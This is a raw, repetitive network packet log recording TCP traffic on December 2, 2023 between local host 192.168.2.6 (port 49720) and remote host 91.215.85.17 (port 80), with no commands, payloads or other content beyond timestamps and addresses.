                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.262619019 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.262644053 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.262644053 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.262725115 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.262737989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.262749910 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.262763023 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.262794971 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.262800932 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.262820005 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.262895107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.262907982 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.262918949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.262954950 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.262984991 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263149977 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263163090 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263206005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263209105 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263217926 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263228893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263245106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263257027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263263941 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263268948 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263282061 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263282061 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263319969 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263362885 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263381958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263395071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263406992 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263420105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263425112 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263432026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263432980 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263443947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263465881 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263487101 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263488054 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263504028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263534069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263545990 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263546944 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263556957 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263567924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263580084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263587952 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263591051 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263603926 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263607979 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263614893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263628006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263633013 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263653994 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263669968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263689995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263715029 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263741970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263753891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263765097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263777018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263793945 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263818979 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263845921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263858080 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263869047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263880968 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263906002 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263927937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263942003 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.263998985 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264014959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264027119 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264039040 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264060020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264065027 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264086962 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264098883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264137030 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264142990 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264184952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264197111 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264209032 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264231920 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264244080 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264272928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264343977 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264355898 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264368057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264396906 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264415979 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264417887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264460087 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264475107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264508963 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264522076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264528036 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264555931 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264641047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264681101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264693975 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264704943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264717102 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264722109 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264729023 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264736891 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264744043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264760971 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264766932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264780045 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264786959 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264791965 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264803886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264828920 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264842987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264849901 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264877081 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264889956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264911890 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264918089 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264934063 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.264975071 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265028000 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265043020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265081882 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265187979 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265201092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265223980 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265249014 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265261889 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265275002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265300035 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265322924 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265324116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265357971 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265369892 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265382051 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265393019 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265398026 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265414953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265422106 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265427113 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265439034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265458107 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.265479088 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.266350985 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.266457081 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478363037 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478384018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478398085 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478410959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478424072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478436947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478473902 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478513956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478517056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478530884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478571892 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478610992 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478624105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478637934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478651047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478662968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478676081 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478702068 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478737116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478750944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478765965 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478790045 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.478806973 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479043961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479151011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479166985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479178905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479191065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479206085 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479252100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479257107 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479266882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479280949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479295015 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479298115 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479307890 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479315996 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479320049 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479334116 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479346037 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479358912 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479383945 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479420900 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479444027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479455948 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479470968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479495049 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479507923 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479532003 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479748011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479763031 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479774952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479789972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479799032 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479801893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479816914 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479826927 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479827881 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479840994 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479845047 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479851961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479862928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479873896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479877949 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479885101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479892969 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479896069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479907990 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479921103 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479931116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479940891 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479943037 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479957104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479969025 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479979992 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479980946 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.479990959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480001926 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480010033 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480012894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480026007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480036974 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480047941 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480048895 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480065107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480074883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480076075 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480086088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480097055 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480098963 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480110884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480117083 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480134010 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480145931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480149984 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480186939 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480189085 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480201006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480237007 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480319977 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480333090 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480344057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480360031 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480369091 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480391979 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480415106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480432034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480448008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480462074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.480483055 CET4972080192.168.2.691.215.85.17
